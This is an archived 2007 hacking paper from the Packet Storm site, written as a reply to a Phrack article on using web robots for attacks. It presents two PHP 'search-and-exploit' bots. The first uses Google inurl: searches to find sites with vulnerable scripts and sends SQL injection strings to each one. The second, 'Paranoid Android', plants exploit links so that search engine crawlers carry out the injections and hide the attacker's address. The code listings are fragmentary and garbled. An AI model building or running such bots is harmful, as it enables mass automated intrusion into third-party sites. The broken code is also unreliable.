what you don't know can hurt you


Posted May 17, 2007
Authored by crossbower | Site playhack.net

I, Bot, Taking Advantage Of Robots Power. A response to the original bot related article in Phrack written by Michal Zalewski.

tags | paper
MD5 | 50a152ffdd28969e6ad885b444f34b17


Change Mirror Download
Title: I, Bot. Taking advantage of robots power.
Re: "Against the System: Rise of the Robots" of Michal Zalewski

Author: Crossbower - crossbower#katamail.com
Site: http://www.playhack.net

Date: 2007-04-18


-[ SUMMARY ]---------------------------------------------------------------------

0x00: Intro, let's start
0x01: Abstract
0x02: Implementation
0x03: The code: Paranoid Android
0x04: Conclusion


---[ 0x00: Intro, let's start ]

Hello to everybody. I'm very sorry for my poor english but it's not my
first language. I hope you will excuse eventual errors Wink

This paper wants to be a reply to an article published on Phrack by Michal Zalewski.
He was the first that has assumed the possibility to take advantage by multitude of
robots that every moment scanning the web to search information.
We begin with the introduction to the article of Zalewski, then will see how
implementing its ideas for writing ours bots.

"Consider a remote exploit that is able to compromise a remote system
without sending any attack code to his victim. Consider an exploit
which simply creates local file to compromise thousands of computers,
and which does not involve any local resources in the attack. Welcome to
the world of zero-effort exploit techniques. Welcome to the world of
automation, welcome to the world of anonymous, dramatically difficult
to stop attacks resulting from increasing Internet complexity.

Zero-effort exploits create their 'wishlist', and leave it somewhere
in cyberspace - can be even its home host, in the place where others
can find it. Others - Internet workers (see references, [D]) - hundreds
of never sleeping, endlessly browsing information crawlers, intelligent
agents, search engines... They come to pick this information, and -
unknowingly - to attack victims. You can stop one of them, but can't
stop them all. You can find out what their orders are, but you can't
guess what these orders will be tomorrow, hidden somewhere in the abyss
of not yet explored cyberspace.

Your private army, close at hand, picking orders you left for them
on their way. You exploit them without having to compromise them. They
do what they are designed for, and they do their best to accomplish it.
Welcome to the new reality, where our A.I. machines can rise against us."

Now we see as all this is possible in reality Wink Have fun!


---[ 0x01: Abstract ]

The idea that the search engines (first of all Google) could be transformed
in powerful arms in the hands of attackers is not new.
Google hacking, search dork, cache digging, are all techniques that allow
to take advantage of a minimal part of motors acquaintance, but a very few
persons, till now, had thought to use their more sensitive and powerful part,
the robot... and this is the topic of this article.

A robot is a program that automatically traverses the Web's hypertext structure
by retrieving pages or documents, and recursively retrieving all documents that
are referenced.
Note that "recursive" here doesn't limit the definition to any specific traversal
algorithm. Even if a robot applies some heuristic to the selection and order of
documents to visit and spaces out requests over a long space of time, it is still
a robot.
Normal Web browsers aren't robots, because they are operated by a human, and
don't automatically retrieve referenced documents.

Web robots are sometimes referred to as Web Wanderers, Web Crawlers, or Spiders.
These names are a bit misleading because they give the impression the software itself
moves between sites like a virus. This not the case, a robot simply visits sites
by requesting documents from them.

What kinds of robots are there? Robots can be used for a number of purposes:
* Indexing
* HTML validation
* Link validation
* "What's New" monitoring
* Mirroring

How many robots circulate in the web?

For having a complete panoramic you can consult the list of active bot
We will not deepen because this argument does not belong to the article's


---[ 0x02: Implementation ]

Which are the force point of a bot?
Surely the speed, the ability to execute a great number of operations in a
little time..
For the exploiting we can write a bot with a function like mirroring,
that with the informations found in a database or in a search engine, can complete
mass penetrations without scanning a great number of useless targets.

A first (and simple) implementation is this script. It can search in a search
engine like google (or other..) and create an array with the addresses
of sites with determined web pages. If qualified, it can exploit automatically
many type of vulnerabilities (for example the sql injection).
Although it is a simple script can become a destructive arm used in the
mistaken way (ok noob?).
I ask therefore eventual readers lamer not to use it in order to damage. It's only
Proof of Concept.

- - - - -

code: - - - - -


echo "
--- Google Finder ---
Automatic SaE (search-and-exploit) Bot
by Crossbower <crossbower AT katamail DOT com>


if ($argc<2) {
echo "Usage: ".$argv[0]." <string> <result>
".$argv[0]." /script/vuln.php?cmd= 30



$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function SendPack($packet)
global $proxy, $host, $port, $proxy_regex;

if ($proxy=='') {
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
if (!$ock) {
echo 'No response from proxy...';die;
if ($proxy=='') {
while (!feof($ock)) {
else {
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$buffer))) {

//Global variables
$host="www.google.com"; //Our vulnerability database ;)
$path=$argv[1]; //String
$port=80; //Port (Web)
$proxy=""; //For your proxy
$html; //Buffer for result

//Google variables
$SeInurl="/search?q=inurl%3A"; //Search inurl
$SeType="&btnG=Search"; //Search type
if ($argv[2]) $SeNumber="&num=".$argv[2];
else $SeNumber="&num=20"; //Number of result

if ($path[0]<>'/') {print("*warning: string must begin with '/'\n");}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

//$path=urlencode($path); //Url encoding

echo "1: Find Targets...\n\n";
//Google's inurl search (example):

/* Make and Send Query */
$packet ="GET ".$SeInurl.$path.$SeNumber.$SeType." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";


/* Find targets urls */
preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match);
for ($i=0; $i<count($match[1]); $i++)
if (strstr($match[1][$i],$path) && !strstr($match[1][$i],"google") && !strstr($match[1][$i],"cache")) echo $match[1][$i]."\n";

/* This code is for exploiting targets. It's Prof of Concept and it isn't complete.
Don't use for laming

$ExplString="?var=" //String for exploiting. Good for sql injection.

for ($i=0; $i<count($match[1]); $i++)
if (strstr($match[1][$i],$path) && !strstr($match[1][$i],"google") && !strstr($match[1][$i],"cache"))


// Make and Send Exploit
$packet ="GET ".$match[1][$i].$ExplString." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";


if (strstr($buffer,$success)) //If the result is positive
// Print result
echo $buffer;


- - - - -

- - - - -


---[ 0x03: The code: Paranoid Android ]

Now we try to implement a different code. A code that uses, in a truly new way,
the crawler of search engines.

The operations of a crawler are simple:
In general, it starts with a list of URLs to visit, called the "seeds".
As the crawler visits these URLs, it identifies all the hyperlinks in the page
and adds them to the list of URLs to visit, called the "crawl frontier".
URLs from the frontier are recursively visited according to a set of policies.

As we can see, this method is closely correlated to the contents of a web page,
that can send it to explore other numerous links.
Now we ask ourselves: how much will be sure this type of method?

We suppose that visited website contains exploit links (example: sql injection)
that call other dynamic pages of websites. What happens in this case?
The heuristic spider follows the links and injects code to the websites.
Then, it saves all result to the database of its search engine.
It's not fantastic? Wink

And in logs which IP does remain? The IP of the search engine, that with the many
sites visited every day by its spider, will make an hard work to find our malicious
site. If it is disposed to make searches…
In any case if our site is uncovered, how many other searches are necessary to
find the guilty?

Now because the code is better than thousand words, here a robot that if configured
correctly can use the techniques described in this article.

VoilĂ  Paranoid Android:

- - - - -

code: - - - - -

<TITLE>Paranoid Android, By Crossbower</TITLE>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<META HTTP-EQUIV="Content-Language" CONTENT=en>
<META name="Keywords" content="Search Bot, ParAnd. PA Robot.">


//Main settings
$string="vuln.php"; //Define the url or the vulnerabilities to try
$exploit="?a='SQL"; //Define the exploit for the vulnerabilities
$LogFile="BotLog.html"; //Log file

//Global variables
$host="www.google.com"; //Our vulnerability database ;)
$port=80; //Port (Web)
$html; //Buffer for result

//Google variables
$SeInurl="/search?q=inurl%3A"; //Search inurl
$SeCache="/search?q=cache%3A"; //Search cache
$SeType="&btnG=Search"; //Search type
$SeNumber="&num=5"; //Number of result

Google's inurl search (example):

//$string=urlencode($string); //Url encoding


echo "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
--- PARANOID ANDROID --- <br>&nbsp;
Automatic SaE (search-and-exploit) Bot <br>&nbsp;&nbsp;
by Crossbower Crossbower*katamail*com <br>

<Thanks to: Radiohead, for the music and the name>


function SendPack($packet)
global $host, $port;

if (!$ock) {
echo 'No response from '.$host.':'.$port; die;


while (!feof($ock)) {


/* Make and Send Query */
$packet ="GET ".$SeInurl.$string.$SeNumber.$SeType." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";


//Open log file
$handle =fopen($LogFile,'a');

//Inizialize the log
fwrite($handle,"\n# ".date("D dS M, Y h:i a :")."<br><br>\n");
fwrite($handle,"Visited by:<br>\n");

$Spider =$REMOTE_HOST."<br>".$REMOTE_ADDR."<br>";

fwrite($handle,"Links (google cache):<br>\n");

$Log ="<a href=\"";

//Find targets
preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match);

for ($i=0; $i<count($match[1]); $i++) {
//Select the result:
if ( strstr($match[1][$i],$string) &&
!strstr($match[1][$i],"google") &&
echo "<a href=\"".$match[1][$i].$exploit."\">".$match[1][$i].$exploit."</a><br>\n";

//Update log

//Close log


- - - - -

- - - - -


---[ 0x06: Conclusion ]

I hope these informations have interested to you and they have made you to
comprise the gravity of the possible attacks with robots, in future...

In order to deepen you can read these documents:

- "Against the System: Rise of the Robots" by Michal Zalewski

- "The Anatomy of a Large-Scale Hypertextual Web Search Engine"
Googlebot concept, Sergey Brin, Lawrence Page, Stanford University

- Proprietary web solutions security, Michal Zalewski

- "A Standard for Robot Exclusion", Martijn Koster

- "The Web Robots Database"

- "Web Security FAQ", Lincoln D. Stein

Ok, this is all people...
For clarifications, questions and other esitate to mail me Wink

Crossbower - crossbower#katamail.com
Site: http://www.playhack.net

Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2020 Packet Storm. All rights reserved.

Security Services
Hosting By